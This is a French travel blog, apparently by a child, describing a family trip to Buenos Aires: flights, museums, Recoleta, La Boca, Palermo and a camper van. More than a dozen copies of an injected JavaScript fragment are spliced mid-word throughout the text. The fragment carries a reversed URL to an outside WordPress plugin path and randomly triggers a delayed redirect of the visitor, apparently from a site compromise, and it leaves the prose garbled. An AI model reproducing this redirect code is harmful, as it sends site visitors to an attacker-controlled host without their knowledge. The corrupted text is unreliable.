Buenos Aires – Départ !

by Alice

Mercredi 4 décembre

Alors déjà je vais te parler de l’avion. Le 1er vol Marseille – Madrid est passé très vite!!! C’était mon premier vol, alors j’étais un peu stressée!!!

Ensuite le 2eme vol Madrid – Buenos Aires était interminable !!! Pour moi 1 ou 2 siècles s’est écoulé !!!! En réalité il a duré 12h30. il y avait le repas du soir et le petit déjeuner, on avait chacun sa tablette pour jouer ou regarder des films. Moi j’ai regardé Vaïna et la moitié d’Aladin. Sinon j’ai dormi ou joué à des jeux.

Après on a pris l’appartement où dedans il y avait un jacuzzi qui ne marchait pas.

Aujourd’hui on est allé au musée de l’enfant (Museo de los Niños), c’est un musée où il y a plein de métiers à faire quand on sera plus grand : Taxi, Caissier au supermarché, Caissier chez Mc Donald, conducteur de bus,….

En rentrant j’ai rencontré une danseuse de tango, ici il y en partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout!  Ici il faut faire très attention aux voitures car elles ne font pas du toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout attention aux piétoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons…

Sinon la viande est DELICIEUSE !!! Un régal !!!

Samedi 7 décembre

Jeudi on est allé dans le quartier de Recoleta, on a visité le cimetière des gens très riches et connus dont Evita qui est très connue car elle a beaucoup aidé les pauvres.

Ensuite on a visité un musée “Prohibido no toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocar”, “Interdit de ne pas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toucher”, c’est un musée de sciences pour les enfants.

Vendredi on est allé dans le quartier très coloré de la Boca. C’est un peintre qui a dit aux gens qui vivaient dans le quartier de peindre leur maison, depuis ce jour les maisons sont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes décorées.On a visité le musée de ce peintre et sa maison. Il avait toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout laissé, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous ses objets, assiettes, fauteuils, pots de peintures…. On a aussi visité le stade de l’équipe de foot.

Boca

Vendredi c’était l’anniversaire de Papa alors on a mangé au restaurant, la viande était délicieuse.

Aujourd’hui on est allé à Palermo, il y avait plein de graffitis sur les murs, ça s’appelle du Street Art. On a fait de la trottinette électrique pour aller visiter des parcs. On a vu des éléphants et pleins d’autres animaux.

En ce moment devant notre appartement il y a un défilé de gens costumés qui jouent de la musique.

Samedi 14 décembre

Dimanche dernier on a rejoint la famille qui nous vend le camping car. Il y a Cédric et Célia le papa et la maman, Lana et Maddy leurs filles. La maison qu’on a loué est grande, il y a 3 chambres mais comme on est 8 il y a des enfants qui dorment par terre dans le salon… Il y avait une piscine, heureusement car il faisait trés trés chaud.

Il y avait aussi Sarah et Nathalie qui venaient nous voir. Elles nous ont donné pleins de choses.

Le camping-car est grand, il y a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout ce qu’il faut (douche, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toilette sèche), lits superposés, moi je dors en haut, un frigo, trois feux au gaz, plusieurs placards pour ranger la nourriture et les affaires, une capucine, un salon.

Hier soir nous avons dormi devant la maison des filles. Et ce soir on dort dans une station essence.